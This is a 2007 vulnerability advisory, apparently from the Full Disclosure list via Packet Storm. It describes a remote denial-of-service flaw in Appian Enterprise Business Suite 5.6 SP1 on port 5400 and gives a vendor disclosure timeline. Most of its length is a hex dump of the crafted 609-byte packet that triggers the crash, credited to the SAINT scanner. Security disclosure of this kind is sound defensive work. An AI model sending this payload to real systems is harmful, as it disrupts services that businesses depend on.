Home / vulnerabilitiesPDF  

appian-dos.txt

Posted on 18 December 2007
Source : packetstormsecurity.org Link

 

Synopsis: Appian Enterprise Business Suite 5.6 SP1 is vulnerable to a
remote DoS attack

Background: "Appian Enterprise Business Process Management (BPM) Suite
Appian Enterprise is the only business process management system that
includes the full suite of components to enable companies to design,
manage and optimize their core business processes."

Affected Versions: 5.6 SP1

Description: Appian Business Suite 5.6 SP1 is vulnerable to a remote DoS
attack due to the way it handles packets on port 5400. This port
handles process execution as describe in the Appian documentation,
"Stores all relevant information about a process during its execution
stage." The vulnerability can be executed by sending a specially
crafted 609 byte size packet to the port (referenced below).
Restarting the application will not work and an entire system reboot
must be preformed to restore service.

Vendor Notified: October 5th 2007
Vendor Response: October 9th 2007
Contact Vendor Developers: November 1st, 2007
Vendor Announces fix/patch: November 27th, 2007

POC code from SAINT vulnerability scanner:

x02x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x73x61x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x31x35x39x36x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x04x03x01x06x0ax09x01x01x00x00x00x00x00
x00x00x00x00x73x61x69x6ex74x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x05x73x61x69x6ex74x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x05x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x0ax05x00x00x00x43x54x2dx4cx69x62x72x61x72x79
x0ax05x00x00x00x00x0dx11x00x73x5fx65x6ex67x6cx69
x73x68x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x02x01x00x61x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x69x73x6f
x5fx31x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x05x00x35x31x32
x00x00x00x03x00x00x00x00xe2x16x00x01x09x06x08x33
x6dx7fxffxffxffxfex02x09x00x00x00x00x0ax68x00x00
x00

Discovered by: Chris Castaldo Initial Release On:
Full Disclosure
"An ounce of prevention is worth a pound of cure."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 

TOP